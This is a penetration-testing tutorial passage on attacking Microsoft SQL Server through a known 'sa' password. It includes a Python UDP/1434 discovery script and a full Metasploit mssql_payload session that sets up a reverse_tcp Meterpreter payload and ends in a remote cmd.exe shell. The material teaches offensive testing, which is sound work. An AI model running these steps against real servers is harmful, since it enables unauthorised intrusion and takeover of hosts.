Let's first take a look at how the exploit works. If you have already read through the Fast-Track section, you will have noticed that something similar happens within Fast-Track as well. When an administrator first installs SQL Server 2000, 2005, or 2008 and selects mixed-mode (Windows plus SQL Server) authentication, they have to set a password for the notorious "sa" account. The "sa" account is the built-in system administrator login for SQL Server: it holds sysadmin rights over the whole instance, including the ability to run operating-system commands through stored procedures such as xp_cmdshell. If you can guess the "sa" password, you can leverage attack vectors in Metasploit to perform additional attacks against the underlying host. Earlier chapters showed how to discover SQL servers by querying the SQL Server Browser service on UDP port 1434, and how to run dictionary-based brute-force attacks against a list of IP addresses in order to guess the "sa" password.
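The UDP/1434 discovery step mentioned above is simple enough to reproduce by hand. The following is an added example, not code from the original page or from Metasploit: it sends the one-byte CLNT_UCAST_EX request from the SQL Server Resolution Protocol (MC-SQLR) to the Browser service and parses the SVR_RESP reply, which is a 0x05 byte, a little-endian 16-bit length, and a ';'-delimited key/value list with instances separated by ';;'. The sample reply embedded in the block is constructed for the example; the host names, instance names and ports in it are assumptions.

```python
"""SQL Server Browser (UDP/1434) discovery: build the probe, parse the reply.

Added example, not part of the original page or of Metasploit. Implements the
MC-SQLR exchange used by discovery modules such as mssql_ping: a CLNT_UCAST_EX
request (0x03) goes to UDP/1434, the Browser service answers with SVR_RESP
(0x05), a little-endian 16-bit length, and ';'-separated key/value pairs with
instances separated by ';;'.
"""
import socket
import struct
import sys

SQLR_PORT = 1434
CLNT_UCAST_EX = b"\x03"  # "enumerate every instance on this host"
SVR_RESP = 0x05

# Constructed sample reply (two instances) shaped like a real SSRP response;
# server/instance names, versions and ports are assumptions for the example.
SAMPLE_DATA = (
    "ServerName;SQLHOST;InstanceName;MSSQLSERVER;IsClustered;No;"
    "Version;10.0.1600.22;tcp;1433;np;\\\\SQLHOST\\pipe\\sql\\query;;"
    "ServerName;SQLHOST;InstanceName;SQLEXPRESS;IsClustered;No;"
    "Version;9.00.5000.00;tcp;49352;;"
)
SAMPLE_RESPONSE = (
    bytes([SVR_RESP]) + struct.pack("<H", len(SAMPLE_DATA)) + SAMPLE_DATA.encode("ascii")
)


def parse_ssrp_response(packet: bytes) -> list[dict]:
    """Return one dict per advertised instance; [] for a malformed or empty reply."""
    if len(packet) < 3 or packet[0] != SVR_RESP:
        return []
    (length,) = struct.unpack_from("<H", packet, 1)
    body = packet[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for record in body.split(";;"):
        fields = record.split(";")
        if len(fields) < 2:
            continue  # trailing empty record after the final ';;'
        # Keys and values alternate: ServerName;X;InstanceName;Y;...
        info = dict(zip(fields[0::2], fields[1::2]))
        if "InstanceName" not in info:
            continue
        # Normalise the TCP port to an int so it can feed RPORT directly.
        if "tcp" in info and info["tcp"].isdigit():
            info["tcp"] = int(info["tcp"])
        instances.append(info)
    return instances


def tcp_targets(instances: list[dict]) -> list[tuple[str, int]]:
    """(instance, port) pairs for instances that expose a TCP listener.
    Instances without a 'tcp' entry are reachable only through named pipes."""
    return [(i["InstanceName"], i["tcp"]) for i in instances if isinstance(i.get("tcp"), int)]


def probe_sql_browser(host: str, timeout: float = 2.0) -> list[dict]:
    """Send CLNT_UCAST_EX to host:1434 and parse the reply ([] if nothing answers)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(CLNT_UCAST_EX, (host, SQLR_PORT))
        try:
            data, _ = sock.recvfrom(65535)
        except socket.timeout:
            return []
    return parse_ssrp_response(data)


if __name__ == "__main__":
    # With a host argument, probe it; otherwise parse the constructed sample.
    found = probe_sql_browser(sys.argv[1]) if len(sys.argv) > 1 else parse_ssrp_response(SAMPLE_RESPONSE)
    for inst in found:
        print(f"{inst.get('ServerName')}\\{inst['InstanceName']} "
              f"version={inst.get('Version')} tcp={inst.get('tcp')}")
```

Two caveats when using this on a real network: the Browser service answers only if it is running (on SQL Server 2000 the listener is built into the engine; on 2005 and later it can be disabled or firewalled, so silence on UDP/1434 does not mean there is no SQL Server), and the reply is an unauthenticated UDP datagram, so treat the advertised port as a hint and confirm it with a TCP connect before pointing RHOST/RPORT at it.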
From here on out, we will assume that you already know the "sa" password for the MSSQL server and that you are ready to deliver your payload to the underlying operating system without using Fast-Track. Because the module authenticates as "sa", it can use xp_cmdshell on the target to write the payload to disk and launch it; note the warning in the module output that it leaves an executable behind in the SQL Server's %TEMP% directory, so record the file name for cleanup afterwards.
Let's launch the attack:
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 453 exploits - 218 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7690 updated today (2009.12.04)
msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 10.10.1.103
LHOST => 10.10.1.103
msf exploit(mssql_payload) > set RHOST 172.16.153.129
RHOST => 172.16.153.129
msf exploit(mssql_payload) > set LPORT 8080
LPORT => 8080
msf exploit(mssql_payload) > set MSSQL_PASS ihazpassword
MSSQL_PASS => ihazpassword
msf exploit(mssql_payload) > exploit
[*] Started reverse handler on port 8080
[*] Warning: This module will leave QiRYOlUK.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (10.10.1.103:8080 -> 10.10.1.103:47384)
meterpreter > execute -f cmd.exe -i
Process 3740 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

